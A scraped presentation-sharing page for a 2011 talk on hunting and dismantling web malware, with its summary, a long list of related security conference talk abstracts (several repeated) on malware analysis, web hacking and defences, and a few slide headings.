This document summarizes a presentation on hunting web malware as a "good hacker" or malware hunter. It discusses browser malware taxonomy, strategies attackers use to infect websites like iframe injections and compromised servers, and methodology for analyzing website traffic dumps to extract malware. It includes two case studies: one on taking down the BlackHole Exploit Pack and another on conducting a SQL injection attack against a SpyEye botnet command and control server. The presentation emphasizes the penetration testing skills and understanding of malware and exploits needed to rigorously hunt for web malware.
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosPROIDEA
Speakers: Matt Johansen, Johnathan Kuskos
Language: English
Every year the security community produces a stunning number of new Web hacking techniques. Now in its 9th year, the Top 10 Web Hacking Techniques list encourages information and knowledge sharing and recognizes researchers who contribute excellent work. In this talk, we will do a technical deep dive and take you through the Top 10 Web Hacks of 2014, as picked by an expert panel of judges. The full list is available here: https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/
CONFidence: http://confidence.org.pl/pl/
42 - Malware - Understand the Threat and How to RespondThomas Roccia
Malware are becoming more and more complex. In this talk presenting with Jean-Pierre Lesueur at the School 42, we explained the business model behind as well provided an understanding of the Malware Threat.
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosPROIDEA
Speakers: Matt Johansen, Johnathan Kuskos
Language: English
Every year the security community produces a stunning number of new Web hacking techniques. Now in its 9th year, the Top 10 Web Hacking Techniques list encourages information and knowledge sharing and recognizes researchers who contribute excellent work. In this talk, we will do a technical deep dive and take you through the Top 10 Web Hacks of 2014, as picked by an expert panel of judges. The full list is available here: https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/
CONFidence: http://confidence.org.pl/pl/
42 - Malware - Understand the Threat and How to RespondThomas Roccia
Malware are becoming more and more complex. In this talk presenting with Jean-Pierre Lesueur at the School 42, we explained the business model behind as well provided an understanding of the Malware Threat.
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...grecsl
Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the the big boys. This presentation covers several analysis environment options and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja (;)) in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
CoinMiners are on the rise, trending so high that in the last couple of month they almost completely replaced ransomware in both media and the research community. Unlike ransomware which profit from rapid encryption of user’s data taken hostage, CoinMiners profit comes from high jacking computer resources. As long as the CoinMiner stays undetected and stealth, the higher its author profit.
In this talk we will focus on the unexplored territory of CoinMiner evasive maneuver and functionality to avoid getting found by its victims and provide tactics and tools to combat them.
Top Ten Proactive Web Security Controls v5Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the the big boys. This presentation covers several analysis environment options and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja (;)) in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
Slides from "Web Applications Automated Security Testing in a Continuous Delivery Pipeline" workshop, made during Drupal Developers Days 2017 at Seville, Spain
DrupalCamp London 2017 - Web site insecurity George Boobyer
Common threats to web security with real world case studies of compromised sites,
- A 'dissection' of a typical common exploit tool and how it operates,
- Simple approaches to mitigating common threats/vulnerabilities,
- Defence in depth – an overview of the various components of web security,
- Drupal specific measures that standard penetration testing often does not account for.
An overview of how to benefit from:
- Security monitoring and log analysis
- Intrusion Detection Systems & Firewalls
- Security headers and Content Security Policies (CSP).
see Drupal Camp London for full details:
http://drupalcamp.london/session/web-site-insecurity-how-your-cms-site-will-get-hacked-and-how-prevent-it
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
The OWASP Top 10 is the standard first reference we give web developers who are interested in making their applications more secure. It is also the categorization scheme we give to web vulnerabilities on our security assessment reports. And finally, and perhaps most frighteningly, it is the most common framework used by organizations for securing their web applications. But what if there was more to web application security than the OWASP Top 10? In this talk, we will discuss vulnerabilities that don't fit into the OWASP Top 10 categories, but are just as dangerous if present in a web application. Developers and pentesters will benefit from this talk, as both exploits and mitigations will be covered for each of the vulnerabilities.
Presentation by Marco Slaviero at Tshwane University Of Technology.
This presentation is about protecting your
your computer against malware. The presentation
begins with a look at different types of malware.
Determining program intent in a general way is discussed. The presentation ends with discussions on practice strategies for both home and enterprise users to protect their computers from infection.
Dissecting State-of-the-Art Android Malware Using Static and Dynamic AnalysisCHOOSE
Steven Arzt — CHOOSE Talk — 2016-11-15
http://www.choose.s-i.ch/events/arzt-2016/
Android malware is getting more and more sophisticated. So-called "sleeper" applications only trigger their malicious behavior after a certain time has passed or event has happened, effectively evading many dynamic analysis techniques. Other techniques include integrity checks as well as detectors for emulators, rooted devices, and hooks. If any such sign is detected, the malware refrains from its actual malicious behavior. For countering static analyses, these apps apply code encryption, packers, and code obfuscators. Together, these features render most automated analyses ineffective, leaving a manual analysis as the only viable option — a very difficult and time-consuming undertaking.
To alleviate the problem, we propose CodeInspect, a new integrated reverse-engineering environment extending the Eclipse IDE and targeting sophisticated state-of-the-art malware apps for Android. CodeInspect not only features an interactive debugger that can work on the bytecode level, but also various static and dynamic analyses that support the human analyst. One can display data flows inside the app, check which permissions are used where in the code, what strings are computed or decrypted at runtime, which code is dynamically loaded and more. Reverse engineers can even add new Java source classes or projects into the application, which can then be called from the original app’s code. This is especially useful when implementing decryption methods which can be directly tested in place.
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...grecsl
Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the the big boys. This presentation covers several analysis environment options and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja (;)) in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
CoinMiners are on the rise, trending so high that in the last couple of month they almost completely replaced ransomware in both media and the research community. Unlike ransomware which profit from rapid encryption of user’s data taken hostage, CoinMiners profit comes from high jacking computer resources. As long as the CoinMiner stays undetected and stealth, the higher its author profit.
In this talk we will focus on the unexplored territory of CoinMiner evasive maneuver and functionality to avoid getting found by its victims and provide tactics and tools to combat them.
Top Ten Proactive Web Security Controls v5Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the the big boys. This presentation covers several analysis environment options and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja (;)) in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
Slides from "Web Applications Automated Security Testing in a Continuous Delivery Pipeline" workshop, made during Drupal Developers Days 2017 at Seville, Spain
DrupalCamp London 2017 - Web site insecurity George Boobyer
Common threats to web security with real world case studies of compromised sites,
- A 'dissection' of a typical common exploit tool and how it operates,
- Simple approaches to mitigating common threats/vulnerabilities,
- Defence in depth – an overview of the various components of web security,
- Drupal specific measures that standard penetration testing often does not account for.
An overview of how to benefit from:
- Security monitoring and log analysis
- Intrusion Detection Systems & Firewalls
- Security headers and Content Security Policies (CSP).
see Drupal Camp London for full details:
http://drupalcamp.london/session/web-site-insecurity-how-your-cms-site-will-get-hacked-and-how-prevent-it
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
The OWASP Top 10 is the standard first reference we give web developers who are interested in making their applications more secure. It is also the categorization scheme we give to web vulnerabilities on our security assessment reports. And finally, and perhaps most frighteningly, it is the most common framework used by organizations for securing their web applications. But what if there was more to web application security than the OWASP Top 10? In this talk, we will discuss vulnerabilities that don't fit into the OWASP Top 10 categories, but are just as dangerous if present in a web application. Developers and pentesters will benefit from this talk, as both exploits and mitigations will be covered for each of the vulnerabilities.
Presentation by Marco Slaviero at Tshwane University Of Technology.
This presentation is about protecting your
your computer against malware. The presentation
begins with a look at different types of malware.
Determining program intent in a general way is discussed. The presentation ends with discussions on practice strategies for both home and enterprise users to protect their computers from infection.
Dissecting State-of-the-Art Android Malware Using Static and Dynamic AnalysisCHOOSE
Steven Arzt — CHOOSE Talk — 2016-11-15
http://www.choose.s-i.ch/events/arzt-2016/
Android malware is getting more and more sophisticated. So-called "sleeper" applications only trigger their malicious behavior after a certain time has passed or event has happened, effectively evading many dynamic analysis techniques. Other techniques include integrity checks as well as detectors for emulators, rooted devices, and hooks. If any such sign is detected, the malware refrains from its actual malicious behavior. For countering static analyses, these apps apply code encryption, packers, and code obfuscators. Together, these features render most automated analyses ineffective, leaving a manual analysis as the only viable option — a very difficult and time-consuming undertaking.
To alleviate the problem, we propose CodeInspect, a new integrated reverse-engineering environment extending the Eclipse IDE and targeting sophisticated state-of-the-art malware apps for Android. CodeInspect not only features an interactive debugger that can work on the bytecode level, but also various static and dynamic analyses that support the human analyst. One can display data flows inside the app, check which permissions are used where in the code, what strings are computed or decrypted at runtime, which code is dynamically loaded and more. Reverse engineers can even add new Java source classes or projects into the application, which can then be called from the original app’s code. This is especially useful when implementing decryption methods which can be directly tested in place.
Weaponised Malware & APT Attacks: Protect Against Next-Generation ThreatsLumension
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
The weaponisation of software has ushered in a new era of cyber attacks. But with 99% of organizations not prepared for this new front line of cyber-warfare, what does this spell for your business?
• Gain a detailed overview of the next generation of threats out there
• Understand how to detect key threats and attacks before they develop a stranglehold on your business
• Implement the right integrated strategy to keep you safe from cybercriminals on today’s front line
Slides for a college course at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_S17.shtml
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
Given at black hat and DEF CON 2010 by Wayne Huang and team.
https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang
http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Huang
DRIVESPLOIT: CIRCUMVENTING BOTH AUTOMATED AND MANUAL DRIVE-BY-DOWNLOAD DETECTION
This year saw the biggest news in Web security ever--Operation Aurora, which aimed at stealing source code and other intellectual properties and succeeded with more than 30 companies, including Google. Incidence response showed that the operation involved an IE 0-day drive-by-download, resulting in Google's compromise and leak of source code to jump points in Taiwan. The US Government is so concerned that they issued a demarche to the Chinese government.
Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in FaceBook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads.
If drive-bys are so easy to inject into high-traffic websites, then the question becomes, how easy it is to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and overview commonly used techniques.
We will reveal for the first time, in this conference, some very advanced techniques that are almost impossible to overcome by automated analysis in the past, now, and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit's a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how this technique easily defeats both automated AND manual detection.
At the very beginning of our talk, we will be giving out a digg.com page, which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download a malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an ipad to whomever from the audience that is able to correctly deobfuscate the javascript and give out the secret phrase.
Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight against Web-based malware. We will also present case studies of our incidence response efforts with organizations hit by Web malware injections such as Google's aurora incident. Based in Taiwan, Co-speaker Wayne has been personally involved in such incidence response efforts since the late 90's.
All source codes related to POC exploits against FaceBook, Google, Digg, LinkedIn, etc, as well as source code of Drivesploit, will be released as open source at the conference.
Attendees will gain the following:
1. Understanding of drive-by downloads and associated terminologies.
2. Information about various drive-by download infection vectors.
3. Appreciation of tools helpful for drive-by analysis, including Malzilla, spikermonkey, rhino, burp and wepawet
4. Realize why drive-by downloads are hard to analyze and detect. Why antivirus fail, why behavior-based approaches fail, and why even manual efforts are difficult
5. Learning the Drivesploit framework and how it can be used to develop poc drive-bys
6. Learning two new deadly techniques: behavior-based browser finterprinting and javascript timelock puzzles
7. Learning how to implement above two using Drivesploit to defeat both automated and manual drive-by analysis
8. Knowledge about the available countermeasures to this threat
I'm Ian. I do that geek thing.
This is an introductory deck on why an SDL or quality/secure software program is a good idea.
I can be found here:
http://gorrie.org
@gorrie
- Owasp AppSec Research 2010 -
Over the past year, clickjacking received extensive media coverage. News portals and security forums have been overloaded by posts claiming clickjacking to be the upcoming security threat.
In a clickjacking attack, a malicious page is constructed (or a benign page is hijacked) to trick the user into performing unintended clicks that are advantageous for the attacker, such as propagating a web worm, stealing confidential information or abusing of the user session.
This presentation introduces a novel solution we designed and implemented for an automated detection of clickjacking attacks on web-pages. The presentation details the architecture of our detection and testing system and it presents the results we obtained from the analysis of over a million "possibly malicious" Internet pages.
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
Our technology, work processes, and activities all are depend based on Operation Systems to be safe and secure. Join us virtually for our upcoming "The Hacking Games - Operation System Vulnerabilities" Meetup to learn how hacker can compromise Operation System, bypass AntiVirus protection layer and exploiting Linux eBPF.
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
Watchtowers of the Internet: Analysis of Outbound Malware Communication, Stephan Chenette, Principal Security Researcher, (@StephanChenette) & Armin Buescher, Security Researcher
With advanced malware, targeted attacks, and advanced persistent threats, it’s not IF but WHEN a persistant attacker will penetrate your network and install malware on your company’s network and desktop computers. To get the full picture of the threat landscape created by malware, our malware sandbox lab runs over 30,000 malware samples a day. Network traffic is subsequently analyzed using heuristics and machine learning techniques to statistically score any outbound communication and identify command & control, back-channel, worm-like and other types of traffic used by malware.
Our talk will focus on the setup of the lab, major malware families as well as outlier malware, and the statistics we have generated to give our audience an exposure like never before into the details of malicious outbound communication. We will provide several tips, based on our analysis to help you create a safer and more secure network.
Stephan Chenette is a principal security researcher at Websense Security Labs, specializing in research tools and next generation emerging threats. In this role, he identifies and implements exploit and malcode detection techniques.
Armin Buescher is a Security Researcher and Software Engineer experienced in strategic development of detection/prevention technologies and analysis tools. Graduated as Dipl.-Inf. (MSc) with thesis on Client Honeypot systems. Interested in academic research work and published author of security research papers.
Similar to OWASP AppSec USA 2011 - Dismantling Web Malware (20)
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
2. Disclaimer
All contents of this presentation represent my own beliefs and views and do not,
unless explicitly stated otherwise, represent the beliefs of my current, or any of my
previous in that effect, employers.
Dependency
Penetration Testing
Web Malware Hunting
Thanks
